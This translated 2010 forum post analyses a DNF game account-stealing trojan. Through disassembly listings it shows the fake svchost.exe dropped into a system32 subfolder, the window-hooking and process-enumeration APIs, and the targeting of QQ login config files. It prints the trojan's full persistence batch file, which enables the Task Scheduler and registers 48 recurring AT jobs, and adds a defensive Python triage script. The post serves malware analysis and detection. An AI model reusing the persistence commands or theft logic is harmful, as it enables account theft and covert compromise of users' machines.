[PC Sample Analysis] Analysis of a DNF Account-Stealing Trojan by 当红小生[LSG]

hixiaosheng posted on 2010-3-8 18:41
This post was last edited by 是昔流芳 on 2011-2-11 12:19

This one is fairly long, so I'll skip the self-introduction... It splits roughly into two parts; for the details, read on!
7339EDA9 . 50 push eax ; /pVersionInformation
7339EDAA . 33FF xor edi,edi ; |
7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
7339EDBC . 33C0 xor eax,eax
......
7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service Pack
7339EE2A . 50 push eax

00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7 into this: it obtains the directory
00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
004068B4 52 push edx
004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; create the directory
004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
004068E7 50 push eax
004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
004068F3 8BD0 mov edx,eax
004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove

00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
00406BAB 50 push eax
00406BAC 68 3C334000 push 脱壳后.0040333C
00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
00406BB7 8BF0 mov esi,eax
00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
00406BBC F7DE neg esi
00406BBE 1BF6 sbb esi,esi
00406BC0 46 inc esi
00406BC1 F7DE neg esi
00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr

733BD096 . 51 push ecx ; /pLocalFileTime
733BD097 . 50 push eax ; |pFileTime
733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
733BD09E . 85C0 test eax,eax
733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
733BD0AE . 52 push edx ; /pSystemTime
733BD0AF . 50 push eax ; |pFileTime
733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime

0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
00410062 33FF xor edi,edi
00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
00410067 897D EC mov dword ptr ss:[ebp-14],edi
0041006A 897D DC mov dword ptr ss:[ebp-24],edi
0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator")
00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
00410086 50 push eax
00410087 6A 01 push 1
00410089 6A FF push -1
0041008B 68 20010000 push 120
00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
00410092 57 push edi
00410093 6A 01 push 1
00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
004100A1 50 push eax
004100A2 6A 01 push 1
004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
004100A7 6A 11 push 11
004100A9 51 push ecx
004100AA 6A 01 push 1
004100AC 68 80000000 push 80
004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
004100B3 83C4 1C add esp,1C
004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
004100B9 6A 01 push 1
004100BB 52 push edx
004100BC 68 244A4000 push 脱壳后.00404A24
004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
004100CD 6A 01 push 1
004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
004100D4 50 push eax
004100D5 6A 02 push 2
004100D7 6A FF push -1
004100D9 6A 20 push 20 ; the function name alone tells you something is about to happen...
004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)

00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
00407288 6A FF push -1
0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
0040729D 51 push ecx
0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat  quite a lot of stuff in here
004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
004072A9 8BD0 mov edx,eax
004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
004072B4 50 push eax
004072B5 6A 01 push 1
004072B7 6A FF push -1
004072B9 6A 02 push 2
004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
{
sc config Schedule start= AUTO
net start schedule
AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
}
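The batch file above is the trojan's persistence layer: it switches the Task Scheduler service on and registers 48 `AT` jobs, one every half hour, each `/interactive` and recurring every day, all pointing at an `svchost.exe` that lives in a subdirectory rather than in `System32` itself. The following script is an added example, not code from the post or from the malware; it parses a batch file of this shape and reports exactly those traits. It assumes a default install with Windows on `C:` so that the only legitimate locations of `svchost.exe` are `System32` and `SysWOW64`; the sample input is a constructed subset of the lines shown above.

```python
"""Static triage of an AT-based persistence script (the SystemDir.bat pattern).

Added example, not part of the original post.  It parses the AT lines,
rebuilds the schedule and flags what a defender cares about: an svchost.exe
outside System32/SysWOW64, /interactive jobs, every-day recurrence, and the
Scheduler service being switched on by the script itself.
"""
import ntpath
import re
from dataclasses import dataclass

# Assumption: default install, OS on C:.  Only these paths host the genuine
# Windows svchost.exe; anything else with that file name is a masquerade.
LEGIT_SVCHOST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
ALL_DAYS = {"M", "T", "W", "TH", "F", "S", "SU"}

# Constructed sample: a subset of the SystemDir.bat lines shown in the post.
SAMPLE_BAT = r"""
sc config Schedule start= AUTO
net start schedule
AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
"""


@dataclass(frozen=True)
class AtJob:
    hour: int
    minute: int
    interactive: bool
    days: frozenset
    command: str


def parse_at_jobs(text):
    """Turn each 'AT hh:mm [/interactive] [/every:days] command' line into an AtJob."""
    jobs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0].upper() != "AT":
            continue
        m = re.fullmatch(r"(\d{1,2}):(\d{2})", parts[1])
        if not m:
            continue
        interactive = False
        days = frozenset()
        cmd_parts = []
        for tok in parts[2:]:
            low = tok.lower()
            if low == "/interactive":
                interactive = True
            elif low.startswith("/every:"):
                days = frozenset(d.upper() for d in tok[len("/every:"):].split(","))
            elif tok.startswith("/"):
                continue  # other AT switches (e.g. /next:) are irrelevant here
            else:
                cmd_parts.append(tok)
        jobs.append(AtJob(int(m.group(1)), int(m.group(2)), interactive, days,
                          " ".join(cmd_parts)))
    return jobs


def enables_scheduler(text):
    """True when the script itself turns the Task Scheduler service on."""
    low = text.lower()
    return "sc config schedule start= auto" in low or "net start schedule" in low


def triage(text):
    """Return a dict of findings; an empty 'masquerade' list means no fake svchost."""
    jobs = parse_at_jobs(text)
    findings = {
        "job_count": len(jobs),
        "masquerade": [],
        "interactive": 0,
        "daily": 0,
        "enables_scheduler": enables_scheduler(text),
        "targets": sorted({j.command.lower() for j in jobs}),
    }
    for j in jobs:
        base = ntpath.basename(j.command).lower()
        if base == "svchost.exe" and j.command.lower() not in LEGIT_SVCHOST:
            findings["masquerade"].append(j.command)
        findings["interactive"] += int(j.interactive)
        findings["daily"] += int(j.days == ALL_DAYS)
    findings["masquerade"] = sorted(set(findings["masquerade"]))
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BAT).items():
        print(f"{key}: {value}")
```

Run against the full 48-line script from the post, `job_count` becomes 48 and every job is both interactive and daily; the single masquerade target and the scheduler-enabling commands are the two facts worth turning into a detection rule.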
=====================================================================(a beautiful divider, wahaha!!)
00402F43 00 db 00
00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
00402F49 . 0BC0 or eax,eax
00402F4B . 74 02 je short svchost.00402F4F
00402F4D . FFE0 jmp eax
00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00402F59 . FFD0 call eax
00402F5B . FFE0 jmp eax ; user32.FindWindowA
00402F5D 00 db 00
00402F5E 00 db 00

00403034   $  A1 20574100   mov eax,dword ptr ds:[415720]
00403039   .  0BC0          or eax,eax
0040303B   .  74 02         je short svchost.0040303F
0040303D   .  FFE0          jmp eax
0040303F   >  68 1C304000   push svchost.0040301C                    ;  user32
00403044   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403049   .  FFD0          call eax
0040304B   .  FFE0          jmp eax                                  ;  SendMessageA

0040307C   $  A1 2C574100   mov eax,dword ptr ds:[41572C]
00403081   .  0BC0          or eax,eax
00403083   .  74 02         je short svchost.00403087
00403085   .  FFE0          jmp eax
00403087   >  68 64304000   push svchost.00403064                    ;  
0040308C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00403091   .  FFD0          call eax
00403093   .  FFE0          jmp eax                                  ;  RtlMoveMemory

00403114   $  A1 44574100   mov eax,dword ptr ds:[415744]
00403119   .  0BC0          or eax,eax
0040311B   .  74 02         je short svchost.0040311F
0040311D   .  FFE0          jmp eax
0040311F   >  68 FC304000   push svchost.004030FC               ;  
00403124   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
00403129   .  FFD0          call eax
0040312B   .  FFE0          jmp eax                             ;  GetForegroundWindow

0040315C   $  A1 50574100   mov eax,dword ptr ds:[415750]
00403161   .  0BC0          or eax,eax
00403163   .  74 02         je short svchost.00403167
00403165   .  FFE0          jmp eax
00403167   >  68 44314000   push svchost.00403144               ;  user32
0040316C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
00403171   .  FFD0          call eax
00403173   .  FFE0          jmp eax                             ;  GetWindowTextA


0040501F   > \68 FC4F4000   push svchost.00404FFC                    ;  GetClassNameA
00405024   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00405029   .  FFD0          call eax
0040502B   .  FFE0          jmp eax                                  ;  GetClassNameA


0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
004034A1 . 0BC0 or eax,eax
004034A3 . 74 02 je short svchost.004034A7
004034A5 . FFE0 jmp eax
004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
004034B1 . FFD0 call eax
004034B3 . FFE0 jmp eax

0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
00403451 . 0BC0 or eax,eax
00403453 . 74 02 je short svchost.00403457
00403455 . FFE0 jmp eax
00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403461 . FFD0 call eax
00403463 . FFE0 jmp eax

00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
0040354D . FFD0 call eax
0040354F .- FFE0 jmp eax ; user32.SetWindowLongA

00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
00402EA9 . 0BC0 or eax,eax
00402EAB . 74 02 je short svchost.00402EAF
00402EAD . FFE0 jmp eax
00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId

00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
00402EB9 . FFD0 call eax
00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId

00411639 . 6A 03 push 3 ; /varType = Long
0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
0041163E . 33FF xor edi,edi ; |
00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
00411645 . 50 push eax ; |ArrayVar
00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
0041165E . 51 push ecx
0041165F . 57 push edi
00411660 . 68 10040000 push 410
00411665 . E8 361BFFFF call svchost.004031A0 ; open the process
{
004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
004031A5 . 0BC0 or eax,eax
004031A7 . 74 02 je short svchost.004031AB
004031A9 . FFE0 jmp eax
004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
004031B5 . FFD0 call eax
004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
}
0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>

004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
004116B1 . 50 push eax
004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
004116B8 . 8BD0 mov edx,eax
004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
004116CF . 68 F4010000 push 1F4
004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
004116D7 . 51 push ecx
004116D8 . 52 push edx
004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi


00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
00404B2D . 0BC0 or eax,eax
00404B2F . 74 02 je short svchost.00404B33
00404B31 . FFE0 jmp eax
00404B7F   > \68 5C4B4000   push svchost.00404B5C                    ;  EnumProcessModules
00404B84   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
00404B89   .  FFD0          call eax
00404B8B   .  FFE0          jmp eax                                  ;  EnumProcessModules


004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy

00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
00403235 . 0BC0 or eax,eax
00403237 . 74 02 je short svchost.0040323B
00403239 . FFE0 jmp eax
0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
00403245 . FFD0 call eax
00403247 . FFE0 jmp eax

0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C2C2 . 6A 00 push 0
0040C2C4 . 6A FF push -1
0040C2C6 . 6A 01 push 1
0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
0040C2D5 . 50 push eax ; /String8
0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal

0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
0040C328 . 6A 00 push 0
0040C32A . 6A FF push -1
0040C32C . 6A 01 push 1
0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
0040C33B . 52 push edx ; /String8
0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
0040C33F . 50 push eax ; |ARG2
0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal


0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]

00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
00404C79 . FFD0 call eax
00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot

00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404CDD . FFD0 call eax
00404CDF . FFE0 jmp eax ; Process32First

00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00404D25 . FFD0 call eax
00404D27 .- FFE0 jmp eax ; kernel32.Process32Next

0040C685 . E8 064C0000 call svchost.00411290 ; create a snapshot
0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
0040C6A1 . 0F84 62240000 je svchost.0040EB09 ; this checks whether DNF.exe is present
0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4


004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
00403505 . FFD0 call eax
00403507 . FFE0 jmp eax


733A03F6    BB B8A63A73     mov ebx,msvbvm60.733AA6B8             ; ThunderRT6Main   
733A03FB    50              push eax
733A03FC    53              push ebx
733A03FD    FF35 D0064A73   push dword ptr ds:[734A06D0]          ; msvbvm60.73390000
733A0403    FF15 F8123973   call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
733A0409    33F6            xor esi,esi
733A040B    85C0            test eax,eax
733A040D    75 71           jnz short msvbvm60.733A0480
733A040F    6A 0C           push 0C
733A0411    8D7D CC         lea edi,dword ptr ss:[ebp-34]
733A0414    59              pop ecx
733A0415    6A 01           push 1
733A0417    FF35 D4064A73   push dword ptr ds:[734A06D4]          ; svchost.00400000

733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
733A1313 . 68 55133A73 push msvbvm60.733A1355
733A1318 . 57 push edi
733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B

004035D0   $  A1 D4574100   mov eax,dword ptr ds:[4157D4]
004035D5   .  0BC0          or eax,eax
004035D7   .  74 02         je short svchost.004035DB
004035D9   .  FFE0          jmp eax
004035DB   >  68 B8354000   push svchost.004035B8                    ;  user32
004035E0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
004035E5   .  FFD0          call eax
004035E7   .  FFE0          jmp eax                                  ;  GetWindowTextLengthW

0040364D   .  0BC0          or eax,eax
0040364F   .  74 02         je short svchost.00403653
00403651   .  FFE0          jmp eax
00403653   >  68 30364000   push svchost.00403630                    ;  user32
00403658   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
0040365D   .  FFD0          call eax
0040365F   .  FFE0          jmp eax                                  ;  GetKeyState

00403690   $  A1 EC574100   mov eax,dword ptr ds:[4157EC]
00403695   .  0BC0          or eax,eax
00403697   .  74 02         je short svchost.0040369B
00403699   .  FFE0          jmp eax
0040369B   >  68 78364000   push svchost.00403678                    ;  user32
